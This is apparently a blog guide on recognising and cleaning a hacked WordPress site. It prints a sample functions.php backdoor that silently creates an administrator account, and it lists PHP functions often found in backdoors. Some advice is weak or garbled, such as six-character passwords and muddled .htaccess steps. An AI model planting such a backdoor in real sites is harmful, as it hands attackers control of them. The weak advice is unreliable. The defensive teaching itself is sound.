WordPress Website Hacked: How To Discover And Recover (UPDATED)

Are you worried and asking yourself these questions?

Is my WordPress site hacked?
Why can’t I log in?
How do I clean a WordPress hack?

Those are the last questions you ever want to ask as a serious webmaster. But the numbers don’t lie. In early 2019, website security provider, Sucuri, released a damning report. The 2018 Hacked Website Trend Report showed a startling 90% of hacks were WordPress hacks.

The report was based on an analysis of 4.4 million cleaned files and 18,302 infected websites.

At the end of August 2019, another backdoor attack warning was sent out through WordFence to over 60 million WordPress site owners.

WordPress does have structures and able developer communities that help protect users against malware and hack attacks. But WordPress websites make up over 30% of all websites, making it a prime target for malicious attacks.

In this ultimate guide to cleaning your hacked WordPress website, you’ll learn why, when, and how a hack looks like so you can take the right actions immediately and recover it in no time.

We’ve organized the guide into four sections:

Why Do WordPress Websites Get Hacked?
Signs Your WordPress Site is Hacked
How to Check If Your WordPress Site Was Hacked?
How to Fix A Hacked WordPress Website
How to Prevent Another Hack Attack in 2021

You’ll notice our proven recommendations for tools, products, tips, and techniques to help you clean a hacked WordPress site where applicable.

As always, we won’t recommend more than three tools at a time for the same job to avoid “choice-whelm”. Just enough to help you get the job done right now.

It’s grueling and overwhelming enough to know your WordPress site has been hacked.

Shall we begin?

Why Do WordPress Sites Get Hacked?

But why, you ask?

A successful WordPress hack can mean a bunch of nasty things for you, including:

Leaking sensitive customer information to unknown people
Losing access to your website’s key areas such as the c-Panel and database
Losing huge traffic through redirects to spam sites, ad pages, and phishing programs
Being blocked by search engines
Losing full access to your website, meaning losing it all
A suspension by your WordPress hosting service
Being blacklisted by other websites
Remember, losing others’ sensitive personal data and being a victim of identity theft are the biggest concerns of many people. So, doing so could land you in double-trouble with fines and penalties.

Source: Gallup

Contrary, all these grueling possibilities can be a goldmine for a hacker.

They can redirect the traffic to gain clicks on ads for monetary gains, collect emails, and fetch transactional information such as credit card numbers for other, more personal attacks.

They can also use your site to create a network of compromised websites, which in turn attack other sites with say a Distributed Denial of Service (DDOS) attack to cripple a competing site.

Beginner hackers could be training or testing their new-found abilities by knocking the server lights off your weakened website.

Some are weird enough to pull a WordPress hack just to see how you’d react. Picture that.

But many WordPress hacks in 2019 were also highly motivated by the “opportunity ” to demand a ransom from unsuspecting, desperate website owners.

Still, in 2018 over 73% of WordPress websites had known security vulnerabilities that hackers could have exploited with basic tools and know-how.

How do you know if your WordPress website is hacked?

Signs Your WordPress Website Got Hacked

Well, that’s not good Google

The signs will fall under one of the following malware types:

Source: Sucuri

Now, can you spot the following?

You can’t find your website online any more
It crashes like never before
Your site redirects to another website or page
If you can even see them, your server logs show activity you had nothing to do with
There are weird code fragments in your site’s header or footer
It displays unconventional ads you would not commission, mostly pharmaceutical type of ads
You’ve received emails from other webmasters telling you your site is sending them SEO spam or appears to be hacked
Google sends you a hacked warning
The site itself displays an in-your-face popup saying it’s been hacked
A drastic or gradual drop in traffic out-of-the-blue
Increased background processes that you didn’t start or allow, so the site is slow or unresponsive
You can’t access the wp-admin URL
When you can’t access your WordPress database, FTP client, or the web host
If you can’t send or receive WordPress emails
Visitors complain their antimalware programs are flagging your site
The appearance of new users and user permissions you didn’t authorize
The website protocol changed or changes from HTTPS to

Check out the additional signs in the following infographic:

Credit: Hacker Combat

If you notice the signs your WordPress site is at risk, the next thing is to try to find out how the hack happened immediately.

How To Check If a WordPress Site Is Hacked

Signs your WordPress site is hacked don’t necessarily mean the site’s been hacked.

To be sure and know exactly how to clean the hacked website, do the following.

Properly Scan Your Site.

Do a full site scan of your WordPress Site to catch malware using the best WordPress security plugin.

We recommend using Sucuri WordPress Scanner or iThemes Security or WordFence Scanner.

These are comprehensive WordPress security providers, complete with malware scanners, automated WordPress security plugins, and proven solid web application firewalls.

After installing and activating Sucuri Scanner, for example, go to Dashboard Admin >> Sucuri Security >> Dashboard to see any threats to deal with.

Sucuri Scanner lets you scan your WordPress site remotely, for example.

Don’t Forget to Check Recently Modified Files

When someone hacks into your account, there are high chances that they’ll modify some files. For that reason, you must check out any such files to help detect suspicious activity.

Here’s how to do it:

Manually Check Recently Modified Files

Log into your server using SSH or FTP client to type in and execute this command:

$ find ./ -type f -mtime -15

It’ll pull up all files modified in the last 15 days
Manually review the last modified date column to catch any suspicious file changes

Use Terminal Commands on Linux

Here’s how to check recently modified files using terminal commands in Linux:

Type in

$ find /etc -type f -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort -r .

Now, type in the following command in your terminal to see directory files:

$ find /etc -printf ‘%TY-%Tm-%Td %TT %p\n’ | sort -r .

Look out for any suspicious file modifications in the last 30 days.

Note: Hackers do change dates on recently modified files to avoid being detected this way. So we recommend using these other diagnostic tools.

Check Your Site’s Security Status in Your Webmaster Tool

Use Google’s Safe Browsing Site Status to see if entering your URL brings up any specific malware, malicious spam, or unauthorized redirects.

You can also use Norton SafeWeb, Bing Webmaster Tool, and Google Webmaster Central.

That way, you may be able to determine the most important aspect of it all: how your site was hacked.

That way, you can begin to understand what and which areas could be compromised, for how long, and how to clean your hacked site.

And how do you clean a hacked WordPress site?

How To Fix Your Hacked WordPress Site

It can be shocking to learn your WordPress site hacking. But it is not a great time to panic, either. You can recover a hacked website-if you know what to do immediately, you find out.

Here’s a step-by-step guide to cleaning a hacked WordPress website.

Restore From Previous Backups

If you can still log in and make some changes, restore a previous backup from a time before you started seeing hack signs.

This is the simplest way to jumpstart your site before it’s hacked away from you.

If you’ve already used VaultPress or best VaultPress alternatives such as UpDraftPlus, BlogVault (includes WooCommerce backup), or BackUpBuddy (automated WordPress backups), it should be a few clicks’ job.

If you hadn’t backed up your site, that’s a bummer, but keep reading below.

If you can’t log in from your WordPress Administration Screen, contact your web host. Hosting plans usually come with tools such as Adminer, Search-Replace-DB, or phpMyAdmin.

Those two are meant to help admins to log in directly into their database bypassing the login screen so they can reset user permissions and lock intruders out.

Do this immediately so you can do the following.

Reinstall WordPress Themes And Plugins

Most WordPress hacks are made through outdated or compromised WordPress plugins and themes.

Check your installed plugs under Dashboard >> Plugins. Click on each and update them to the latest release.

Often, developers release a new update to patch up a vulnerability, improve performance metrics, or both. So, they may have patched up the “backdoor”.

Temporarily Place Your Site To Maintenance Mode

Use a plugin such as Coming Soon Page Mode and Maintenance Mode to inform visitors, search engines, and the hackers the site is out temporarily.

There’s a free and paid version.

The paid plugin allows you to:

Collect visitors’ emails
Display HTTP status code 503 to keep search crawlers from suspending your site as a malware pit
Add footer branding to let everyone know it’s still your site.

Reset Passwords

Change the critical passwords to your site’s:

cPanel
Wp dashboard
File Transfer Protocol (always use Secure FTP or SFTP)
MySQL database

See how to change your WordPress username in this quick video:

Then go to cPanel >> Security >> Password Protect Directories >> WebRoot (in the popup) >> wp-admin. Then follow the prompts to password-protect your site again.

Remove Malware From Your WordPress Site

Before you do anything here, ensure you’ve backed up your site with a secure and dependable WordPress backup plugin.

And if you are not sure how to edit files in your WP database, feel free to ask for help.

Note: Doing it wrong can crash your site.

Changing the passwords lets you keep everyone else out as you embark on cleaning your hacked site-the files and tables in your database.

Here’s how to do that.

Cleaning Hacked WordPress Files

Use secure FTP (SFTP) or SSH to log into your server
See files that were recently changed
Note the date, time, and user that made the changes and determine if they were authorized changes
Reinstate the suspicious files from the WP repository
Open any file that’s not in the original repository with a text editor
Cut out any suspicious lines of code within the custom files

After these steps, go back and verify the site’s working as it should again. If not, you’ll have to restore the WordPress backup you made before making the database changes. Then cut some other code.

Cleaning Hacked Database Tables

Again, seek professional help if you have any doubts.

Log into your database admin panel
Ensure you’ve made the necessary backups
Look for suspicious content, including spammy links and keywords
When you see any, open the table it is contained in
Delete the suspicious content
Verify the site is working as it should
Manually remove any database-access tool you may have

If you’d rather clean your WordPress database with a plugin after a hack, use the WP-Optimizer plugin to get it done. It’ll go deeper and clean any junk you don’t need so you can also increase your WordPress loading speed.

Remove Hidden Backdoors

To remove WordPress backdoors, you must detect and find them first, of course.

So, how do you do that?

To find a WordPress backdoor in a theme, start with inactive themes. Look out for the functions.php file. Then examine if it has been injected with suspicious code

Here’s an example code showing an infected functions.php file:

<?php
add_action('wp_head', 'Wordpress_backdoor');

function WordPress_backdoor() {
    If ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        If (!username_exists('backdooradmin')) {
            $user_id = wp_create_user('backdooradmin', 'Pa55W0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator')        
        } 
    } 
}
?>

Functions.php WordPress theme backdoor example

To find a backdoor in a WordPress plugin (like in Contact Form 7), make an FTP search to reveal the buggy plugins. You can’t see them on the dashboard.

Often, installation files containing backdoors will have hogwash code you’ll recognize pretty fast.

Now To Delete WordPress Backdoors:

Delete the .htaccess file by going to Settings>>Permalink, then delete and save changes. The .htaccess file regenerates itself, so no problems with figuring out how to recreate it.
Delete all inactive themes
Delete all inactive plugins
Delete all infected plugins and redownload the most up-to-date versions
Let your developer inspect the uploads directory on your behalf and fix any trouble in the extremely sensitive wp-config.php file

To ease your work, you can use one of the WordPress malware cleaners recommended here to find and fix backdoors fast.

The best ones, such as Sucuri and iThemes Security, will alert you immediately they find a backdoor so you can fix it before it becomes a problem.

Common PHP Functions In Backdoors

There are some common functions you can look out for and use to identify WordPress backdoors.

Here are they are:

Exec
Eval
Stripslashes
Preg_replace (with/e/)
Move_uploade_file
Gzuncompress
Str_rot13
Base64
Assert
System

Sucuri also recently reported how some hackers are using “excerpt” to run commands via a WordPress backdoor.

You can recognize malicious functions by their encoding, which most files in the WordPress repository do not use.

Remove Suspicious Users

An easy to go about is to use the Sucuri WordPress plugin as an admin to delete or change an unauthorized or authorized user’s password, respectively.

There’s a manual route if you so choose.

Just login >> Users. Then hover over the suspicious user and delete their account.

Remove Unwanted Files

Scanning for unwanted files manually can not only be tedious, but it can make you skip or miss a bunch of malicious files in the process.

Use a top security plugin for that.

Use Sucuri or WordFence to identify any new or inappropriate files.

The tools will flag whatever file that shouldn’t be there, and you can decide whether to delete it or keep it.

Remove Malware Warnings

Spam authorities detect and issue suspension warnings against infected sites. Those include Google, the largest search engine provider.

How to remove malware warnings in WordPress?

If you’ve been served with such a warning, you’ll need to submit a request to be cleared and the suspension removed over your site.

You’ll need to fill such a form for each of the authorities that issued you with a warning.

And you may have to explain how you got rid of the malware.

However, if you’ve installed Sucuri Security, it’ll do that on your behalf.

Install SSL Certificate

Contact your web host service for this. Some can provide you with a free SSL certificate.

If you prefer to go out on your own, though, check out CloudFlare for a free SSL certificate for WordPress.

The Cloudflare WordPress plugin also offers premium DDOS protection for WordPress, so you’ll have a firm grasp on your domain protections with it.

Move To Secured WordPress Hosting

Upgrade to premium WordPress hosting

The cheapest shared WordPress hosting services tend to expose subscribers to DDOS and other attacks. So, use reputable ones such as Bluehost, inMotion Hosting, or GoDaddy.

But if you are ready to use much superior protection, go for secure MySQL database services such as DigitalOcean.

But for the best and most secure, choose SiteGround, WP Engine, or Kinsta for managed WordPress hosting.

Clean Out Your Sitemap And Resubmit To Google

You can clean and create a new WordPress sitemap easily using a top WordPress SEO plugin.

The two best for the job are Yoast SEO WordPress plugin and All in One SEO Pack plugins.

Using such plugins, you can create an XML sitemap of your recovered site to submit to Google via Google Search Console to have the search engine start crawling your site again.

If this all feels like a lot of work or is too techy, feel free to ask a professional to do it on your behalf.

How To Prevent WordPress Hacking In The Future

It is not enough to just recover your WordPress website after a hack. Do the following to harden your site against future attempts.

Add Stronger Passwords

Use a minimum of 6 characters-a combination of letters, special characters, and numbers for your login, database, and

You can use a strong password generator such and Force Strong Passwords plugin to ensure your other users use strong passwords for their accounts as well.

If you’re worried about forgetting the strong password, use one of the best password managers, such as 1Password, LastPass, or DashLane.

Update The WordPress Version

A 2018 WordPress vulnerabilities report showed if you are still using a WordPress 4.0 and earlier version, you are at the highest risk of being hacked.

WordPress v5.3 has been out for a while now. Take advantage and download the latest now for security patch-ups to known vulnerabilities.

Generate New Secret Keys

Your WordPress database security keys handle the encryption of cookies information. Clear the old ones and create fresh new ones using the provided WordPress tool.

If you are even a bit unsure, contact your web host or professional WordPress security service provider for help.

When done improperly, changing your database security keys can crash your site.

Never Use Nulled Themes And Plugins

Investing in the best WordPress themes and plugins costs a bit of money.

But the figure can be nothing compared to what and how much you can lose or the cost of recovering from a WordPress website hacking.

Only use free WordPress plugins if they are reputable. Often, though, use paid themes and plugins because they are regularly updated with security and other performance-boosting packs.

Set Backups: Use The Best WordPress Backup Plugin

Use VaultPress to backup safe versions of your website. Do this immediately and regularly, depending on how many changes you make to your site over any given period.

If you have a big site with multiple pages and files changing frequently, you can choose the daily backup option.

If yours is a static website that doesn’t make as many changes to its database and framework, you can opt for the weekly or biweekly backup options.

Remember, frequent backups can overtime weigh down WordPress page loading speed-if not cleaned.

Website Firewall: Strengthen Your WordPress Site

Use the top web application firewall plugins or apps to harden your site and automatically curb brute force, DDOS, and other attacks.

WebARX, Kinsta, iThemes Security, and Sucuri are great full-blown web application firewall providers you can work with right now.

Also, use the Perfmatters plugin or Disable XML-RPC Plugin to disable the passing of multiple commands in a single HTTP request, something a hacker would do.

Final Thoughts: Never Let Your WordPress Website Get Hacked Again

Cleaning a hacked WordPress website can be a long, frustrating, and potentially expensive process in every sense.

The best you can do is to recover your hacked site and apply the best WordPress hardening methods to secure the site against future attacks.

One of the foremost ways to do that is always to back up your site. Do this as frequently as possible.

Next up, use a top WordPress security plugin. Then ensure your WordPress core, themes, and plugins are all updated and malware-free. With those three WordPress security best practices well in place, you can curb most hack attempts. But in case an unrelenting hacker compromises your site, follow this guide to cleaning a hacked WordPress site to get back your online assets.

Read Other WordPress Guides:

WordPress Website Hacked: How To Discover And Recover From A WordPress Hack (Step-By-Step Guide for 2023)

Why Do WordPress Sites Get Hacked?

Signs Your WordPress Website Got Hacked